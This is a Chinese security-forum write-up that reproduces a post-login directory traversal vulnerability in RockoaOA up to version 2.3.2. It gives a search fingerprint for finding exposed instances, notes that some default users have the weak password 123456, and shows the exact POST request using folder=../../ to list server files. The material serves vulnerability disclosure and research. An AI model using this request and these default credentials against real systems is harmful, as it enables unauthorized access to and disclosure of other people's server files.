问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
RockoaOA beifenAction.php 后台目录遍历漏洞
# RockoaOA beifenAction.php 后台目录遍历漏洞 ## 漏洞描述 RockoaOA beifenAction.php文件中调用了 getfilerows方法,导致了目录遍历漏洞,攻击者通过漏洞可以获取服务器上的文件信息...
RockoaOA beifenAction.php 后台目录遍历漏洞 ================================== 漏洞描述 ---- RockoaOA beifenAction.php文件中调用了 getfilerows方法,导致了目录遍历漏洞,攻击者通过漏洞可以获取服务器上的文件信息 漏洞影响 ---- RockoaOA <= 2.3.2 网络测绘 ---- app="Rockoa协同办公系统" 漏洞复现 ---- 登录页面 ![img](https://shs3.b.qianxin.com/butian_public/f894183a1d9c74783f8f33463972c57bedfad106111a5.jpg) 其中默认存在几个用户存在弱口令 123456 ![img](https://shs3.b.qianxin.com/butian_public/f7442190cbc2c2ea09098cfc159aa932606bb9a2b7044.jpg) 存在漏洞的文件为 `webmain/system/beifen/beifenAction.php` ![img](https://shs3.b.qianxin.com/butian_public/f35313250223b72ae74588e35e9914b718433c5498ff2.jpg) 查看 `getfilerows()` 方法,在 `include/chajian/fileChajian.php` ![img](https://shs3.b.qianxin.com/butian_public/f7828179d53781a586c152cd33f572df74ff87cf1f68e.jpg) 该方法遍历目录下的文件名并输出,登录后,发送请求包 ```python POST /index.php?a=getdatssss&m=beifen&d=system&ajaxbool=true folder=../../ ``` ![img](https://shs3.b.qianxin.com/butian_public/f804756049c7401d3d87a7621e95f021be286230a43a4.jpg)
发表于 2024-07-12 18:44:15
阅读 ( 982 )
分类:
OA产品
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!